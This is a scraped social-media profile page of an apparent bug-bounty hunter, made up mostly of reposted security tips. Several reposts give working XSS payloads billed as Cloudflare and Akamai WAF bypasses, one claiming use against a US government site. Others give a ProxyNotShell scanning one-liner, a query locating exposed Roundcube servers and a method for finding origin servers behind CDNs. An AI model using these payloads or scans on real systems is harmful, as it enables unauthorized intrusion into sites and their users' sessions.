attackbro12's profile picture. I'm studying hacking and working hard as a hacker, bugbounter :)🖥I majored in Security Engineering and have master's degree.🎓 Let's Hack Together!

LittleAttack3r🖥️

@attackbro12

I'm studying hacking and working hard as a hacker, bugbounter :)🖥I majored in Security Engineering and have master's degree.🎓 Let's Hack Together!

LittleAttack3r🖥️ reposted

한국디지털헬스케어진흥재단 소개자료.pdf.lnk 8458e7351be79746bb9e95fc59a8da74bdadbe398dcd93dea9d9adc69ccbccd7 견적서.pdf.lnk c4a4ee1eabbd46e6a575c82ba8c5c08f293ac554179e965b04d7c4d2432d3691 #APT #DPRK

byrne_emmy12099's tweet image. 한국디지털헬스케어진흥재단 소개자료.pdf.lnk
8458e7351be79746bb9e95fc59a8da74bdadbe398dcd93dea9d9adc69ccbccd7
견적서.pdf.lnk
c4a4ee1eabbd46e6a575c82ba8c5c08f293ac554179e965b04d7c4d2432d3691
#APT #DPRK
byrne_emmy12099's tweet image. 한국디지털헬스케어진흥재단 소개자료.pdf.lnk
8458e7351be79746bb9e95fc59a8da74bdadbe398dcd93dea9d9adc69ccbccd7
견적서.pdf.lnk
c4a4ee1eabbd46e6a575c82ba8c5c08f293ac554179e965b04d7c4d2432d3691
#APT #DPRK
byrne_emmy12099's tweet image. 한국디지털헬스케어진흥재단 소개자료.pdf.lnk
8458e7351be79746bb9e95fc59a8da74bdadbe398dcd93dea9d9adc69ccbccd7
견적서.pdf.lnk
c4a4ee1eabbd46e6a575c82ba8c5c08f293ac554179e965b04d7c4d2432d3691
#APT #DPRK
byrne_emmy12099's tweet image. 한국디지털헬스케어진흥재단 소개자료.pdf.lnk
8458e7351be79746bb9e95fc59a8da74bdadbe398dcd93dea9d9adc69ccbccd7
견적서.pdf.lnk
c4a4ee1eabbd46e6a575c82ba8c5c08f293ac554179e965b04d7c4d2432d3691
#APT #DPRK

LittleAttack3r🖥️ reposted

Find the origin servers of websites protected by Cloudflare, Sucuri, or Incapsula with a misconfigured DNS. ⚔️ - github.com/MrH0wl/Cloudma… Credit: @0x0SojalSec #infosec #bugbountytips #Cybersecurity

viehgroup's tweet image. Find the origin servers of websites protected by Cloudflare, Sucuri, or Incapsula with a misconfigured DNS. ⚔️ 
- github.com/MrH0wl/Cloudma… 

Credit: @0x0SojalSec 
#infosec #bugbountytips #Cybersecurity

LittleAttack3r🖥️ reposted

🤬CVE-2025-49113: Post‑Auth Remote Code Execution in Roundcube via PHP Object Deserialization FOFA Link: en.fofa.info/result?qbase64… FOFA Query: app="roundcube" Results: 51,584,735 Advisory:nvd.nist.gov/vuln/detail/CV… CVSS: 9.9

TheMsterDoctor1's tweet image. 🤬CVE-2025-49113: Post‑Auth Remote Code Execution in Roundcube via PHP Object Deserialization

FOFA Link: en.fofa.info/result?qbase64… 

FOFA Query: app="roundcube"  

Results: 51,584,735  
Advisory:nvd.nist.gov/vuln/detail/CV… CVSS: 9.9

LittleAttack3r🖥️ reposted

🧠 WAF Bypass via Obfuscation (XSS Payload) 1️⃣ WAF blocks <script>alert(1)</script> 2️⃣ Attacker obfuscates payload: <img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)> 3️⃣ Browser decodes entities, WAF misses it 🎯 Payload sneaks past filter, XSS triggers #bugbounty #xss

NullSecurityX's tweet image. 🧠 WAF Bypass via Obfuscation (XSS Payload)
1️⃣ WAF blocks &amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;
2️⃣ Attacker obfuscates payload:
&amp;lt;img src=x onerror=&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;(1)&amp;gt;
3️⃣ Browser decodes entities, WAF misses it
🎯 Payload sneaks past filter, XSS triggers
#bugbounty #xss

LittleAttack3r🖥️ reposted

Red Team & Blue Team Tools🔵🔴 🔗github.com/Ignitetechnolo…

0xharshleen's tweet image. Red Team &amp;amp; Blue Team Tools🔵🔴
🔗github.com/Ignitetechnolo…

LittleAttack3r🖥️ reposted

🚨 أبرز 10 مجموعات اختراق النشطة لهذا الأسبوع (2 - 8 أبريل 2025): 1️⃣ NoName057(16) 2️⃣ Keymous+ 3️⃣ Red Wolf Cyber 4️⃣ AnonSec 5️⃣ Akira 6️⃣ Qilin 7️⃣ Electronic Army Special Forces 8️⃣ AnonPioneers 9️⃣ Play 🔟 SERVER KILLERS #الأمن_السيبراني #CyberThreats #ThreatIntel

xabdul's tweet image. 🚨 أبرز 10 مجموعات اختراق النشطة لهذا الأسبوع (2 - 8 أبريل 2025):

1️⃣ NoName057(16)
2️⃣ Keymous+
3️⃣ Red Wolf Cyber
4️⃣ AnonSec
5️⃣ Akira
6️⃣ Qilin
7️⃣ Electronic Army Special Forces
8️⃣ AnonPioneers
9️⃣ Play
🔟 SERVER KILLERS

#الأمن_السيبراني #CyberThreats #ThreatIntel

LittleAttack3r🖥️ reposted

Malware Reverse Engineering for Beginners – Part 1: From 0x0 intezer.com/blog/malware-r…

5mukx's tweet image. Malware Reverse Engineering for Beginners – Part 1: From 0x0

intezer.com/blog/malware-r…

LittleAttack3r🖥️ reposted

Bash Scripting Basics👾

0xharshleen's tweet image. Bash Scripting Basics👾

LittleAttack3r🖥️ reposted

Don't ask anyone how to learn bugbounty or how to get started. We have created the first platform to learn and ask questions about bugbounty. ethical hacking .CTF Information you can't find on the Internet is available on the website #bugbountytips #bugbounty #infosec #CTF

lu3ky13's tweet image. Don&apos;t ask anyone how to learn bugbounty or how to get started. We have created the first platform to learn and ask questions about bugbounty.  ethical hacking .CTF 
 Information you can&apos;t find on the Internet is available on the website

#bugbountytips #bugbounty #infosec #CTF
lu3ky13's tweet image. Don&apos;t ask anyone how to learn bugbounty or how to get started. We have created the first platform to learn and ask questions about bugbounty.  ethical hacking .CTF 
 Information you can&apos;t find on the Internet is available on the website

#bugbountytips #bugbounty #infosec #CTF

LittleAttack3r🖥️ reposted

CloudFlare #XSS Bypass <Img Src=OnXSS OnError=confirm(1)> => Why this new one is better? Because the <Img> element pops also in DOM scenarios where <Svg> can't. That very payload is currently available in @KN0X55 Pro and also in demo.

BRuteLogic's tweet image. CloudFlare #XSS Bypass

&amp;lt;Img Src=OnXSS OnError=confirm(1)&amp;gt;

=&amp;gt; Why this new one is better? 
Because the &amp;lt;Img&amp;gt; element pops also in DOM scenarios where &amp;lt;Svg&amp;gt; can&apos;t.

That very payload is currently available in @KN0X55 Pro and also in demo.

LittleAttack3r🖥️ reposted

Cloudflare XSS bypass, payload reflected in the script tag Payload : </script><embed/embed/embed/src=//14.rs> #bugbountytip #bugbounty #XSS

Cy83r_v1p3r's tweet image. Cloudflare XSS bypass, payload reflected in the script tag
Payload : &amp;lt;/script&amp;gt;&amp;lt;embed/embed/embed/src=//14.rs&amp;gt;

#bugbountytip #bugbounty #XSS
Cy83r_v1p3r's tweet image. Cloudflare XSS bypass, payload reflected in the script tag
Payload : &amp;lt;/script&amp;gt;&amp;lt;embed/embed/embed/src=//14.rs&amp;gt;

#bugbountytip #bugbounty #XSS
Cy83r_v1p3r's tweet image. Cloudflare XSS bypass, payload reflected in the script tag
Payload : &amp;lt;/script&amp;gt;&amp;lt;embed/embed/embed/src=//14.rs&amp;gt;

#bugbountytip #bugbounty #XSS
Cy83r_v1p3r's tweet image. Cloudflare XSS bypass, payload reflected in the script tag
Payload : &amp;lt;/script&amp;gt;&amp;lt;embed/embed/embed/src=//14.rs&amp;gt;

#bugbountytip #bugbounty #XSS

LittleAttack3r🖥️ reposted

Cloudflare Stored #XSS WAF Bypass Payload: <img src=1 href=1 onerror="javascript:alert('HEJAP ZAIRY AL-SHARIF')"></img> or "><sc<>ript><onxXxxXXxXXXxx=()%20autofoco%20onmouseover=alert("HEJAP ZAIRY AL-SHARIF")></scr<>ipt> #BugBounty #0day #0day_Hejap

Inventory Management System 1.0 Cross Site Scripting packetstormsecurity.com/files/166373 #exploit



LittleAttack3r🖥️ reposted

Okay This Actually Works Well, 1. Used KXSS(by @TomNomNom ) and Found Out That this it allows <'>" and is being reflected inside script tags. 2. Tried out "-alert()-" ==> blocked 3. Tried, "-window.alert?.()-" ==> Bypassed 😛

SMHTahsin33's tweet image. Okay This Actually Works Well, 
1. Used KXSS(by @TomNomNom ) and Found Out That this it allows &amp;lt;&apos;&amp;gt;&quot;
and is being reflected inside script tags.
2. Tried out &quot;-alert()-&quot;  ==&amp;gt; blocked
3. Tried, &quot;-window.alert?.()-&quot;    ==&amp;gt; Bypassed 😛
SMHTahsin33's tweet image. Okay This Actually Works Well, 
1. Used KXSS(by @TomNomNom ) and Found Out That this it allows &amp;lt;&apos;&amp;gt;&quot;
and is being reflected inside script tags.
2. Tried out &quot;-alert()-&quot;  ==&amp;gt; blocked
3. Tried, &quot;-window.alert?.()-&quot;    ==&amp;gt; Bypassed 😛

LittleAttack3r🖥️ reposted

Akamai Kona WAF #XSS #Bypass 😎 1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)> Courtesy by @KN0X55 Pro v3.5 #BlackFriday2023 #CyberMonday2023


LittleAttack3r🖥️ reposted

Bypassed strong Akamai WAF of 🇺🇸 Usa Department of Justice 🚔 payload: '"><A HRef=" AutoFocus OnFocus=top/**/?.'ale'%2B'rt'>" credit: @coffinxp7 #bugbountytips #bugbounty

RootMoksha's tweet image. Bypassed strong Akamai WAF of 🇺🇸 Usa Department of Justice 🚔

payload: &apos;&quot;&amp;gt;&amp;lt;A HRef=&quot; AutoFocus OnFocus=top/**/?.&apos;ale&apos;%2B&apos;rt&apos;&amp;gt;&quot; 

credit: @coffinxp7 

#bugbountytips #bugbounty

LittleAttack3r🖥️ reposted

Free query shodan 1000 result IP "Tips bug bounty" Example query: https]://www.shodan.io/search/facet?query=hostname%3A*.apnic.net&facet=ip Download source page Regex: grep '<strong>' shodan.html | cut -d '>' -f 4 | cut -d '<' -f 1 #bugbountytip


Hello Hackers! I found IIS page while doing bugbounty. I fuzzed some content, but there were no .aspx or .zip, .dll files in there. Any one have good idea to find juicy things on this? #BugBounty @GodfatherOrwa @DarkTamil6

attackbro12's tweet image. Hello Hackers! I found IIS page while doing bugbounty. I fuzzed some content, but there were no .aspx or .zip, .dll files in there. Any one have good idea to find juicy things on this?
#BugBounty
@GodfatherOrwa
@DarkTamil6

LittleAttack3r🖥️ reposted

I had fun looking at which backup extensions were the most common on which tech & here's a short list: WP: .tar/.zip Joomla: .tar/.zip Drupal: .tar/.zip PrestaShop: .tar/.zip Apache: .tar (.tar.gz, .tar.bz2) Nginx: .tar IIS: .zip/.cab Tomcat: .war/.jar #bugbountytips #BugBounty


LittleAttack3r🖥️ reposted

An interesting trick: you can bypass a WAF during a XSS attack on ASP(dot)NET/IIS technology by using a HTTP parameter pollution attack. #BugBounty #BugBountyTips #InfoSec (Credit to Acunetix) Full article: acunetix.com/blog/whitepape…

aacle_'s tweet image. An interesting trick: you can bypass a WAF during a XSS attack on ASP(dot)NET/IIS technology by using a HTTP parameter pollution attack. 

#BugBounty #BugBountyTips #InfoSec 

(Credit to Acunetix)
Full article: acunetix.com/blog/whitepape…

LittleAttack3r🖥️ reposted

Oneliner CVE-2022-41040 ProxyNotShell ffuf -w "urls.txt:URL" -u "https://URL/autodiscover/autodiscover.json?@URL/&Email=autodiscover/autodiscover.json%3f@URL" -mr "IIS Web Core" -r Vulnerable = 404 #BugBounty #bugbountytip #bugbountytips


Loading...

Something went wrong.


Something went wrong.